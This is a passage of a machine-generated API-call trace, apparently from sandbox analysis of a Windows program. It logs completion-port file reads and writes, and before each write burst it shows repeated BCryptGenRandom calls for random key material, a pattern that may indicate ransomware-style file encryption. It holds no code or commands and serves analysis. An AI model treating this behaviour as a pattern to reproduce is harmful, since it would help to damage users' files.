CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0108.312] ReadFile (in: hFile=0x3ac, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x6a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0108.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0108.313] CloseHandle (hObject=0x3ac) returned 1 [0108.314] free (_Block=0x3e70008) [0108.314] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.374] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.385] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.402] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.412] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x20ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0109.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0109.438] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.438] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.438] free (_Block=0x77d800) [0109.438] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.438] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.438] free (_Block=0x1fa4848) [0109.438] free (_Block=0x2071818) [0109.438] free (_Block=0x77d908) [0109.438] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0109.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.450] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.468] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc20, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0109.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0109.477] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.477] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.477] free (_Block=0x77d800) [0109.477] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.477] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.477] free (_Block=0x1fa4848) [0109.477] free (_Block=0x2071818) [0109.477] free (_Block=0x77d908) [0109.477] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.590] CloseHandle (hObject=0x81c) returned 1 [0109.596] free (_Block=0x3e70008) [0109.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.654] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.664] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0109.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.676] WriteFile (in: hFile=0x3ac, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.686] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1c08, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.687] CloseHandle (hObject=0x2f4) returned 1 [0109.697] free (_Block=0x1ff1e60) [0109.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0109.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0109.710] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.710] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.710] free (_Block=0x77d800) [0109.710] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.710] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.710] free (_Block=0x1fa4848) [0109.710] free (_Block=0x2071818) [0109.710] free (_Block=0x77d908) [0109.710] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0109.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0109.714] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.714] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.714] free (_Block=0x77d800) [0109.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.714] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.714] free (_Block=0x1fa4848) [0109.714] free (_Block=0x2071818) [0109.714] free (_Block=0x77d908) [0109.714] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.731] CloseHandle (hObject=0x13c0) returned 1 [0109.736] free (_Block=0x3e70008) [0109.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.749] ReadFile (in: hFile=0x3ac, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x752, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0109.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.768] CloseHandle (hObject=0x2f4) returned 1 [0109.772] free (_Block=0x1ff1e60) [0109.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.790] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0109.806] ReadFile (in: hFile=0x81c, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x108c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.264] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x78c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.264] CloseHandle (hObject=0x3bc) returned 1 [0110.265] free (_Block=0x3ef0008) [0110.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0110.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0110.275] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.275] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.275] free (_Block=0x77d800) [0110.275] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.275] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.276] free (_Block=0x1fa4848) [0110.276] free (_Block=0x2071818) [0110.276] free (_Block=0x77d908) [0110.276] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.277] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.289] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2708, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.290] CloseHandle (hObject=0x3bc) returned 1 [0110.292] free (_Block=0x3ef0008) [0110.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0110.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0110.301] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.302] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.302] free (_Block=0x77d800) [0110.302] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.302] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.302] free (_Block=0x1fa4848) [0110.302] free (_Block=0x2071818) [0110.302] free (_Block=0x77d908) [0110.302] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.304] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x5130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.304] CloseHandle (hObject=0x3bc) returned 1 [0110.305] free (_Block=0x3ef0008) [0110.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0110.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0110.315] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.315] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.315] free (_Block=0x77d800) [0110.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.315] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.316] free (_Block=0x1fa4848) [0110.316] free (_Block=0x2071818) [0110.316] free (_Block=0x77d908) [0110.316] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.317] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.318] CloseHandle (hObject=0x3bc) returned 1 [0110.318] free (_Block=0x3ef0008) [0110.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0110.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0110.326] calloc (_Count=0x40, 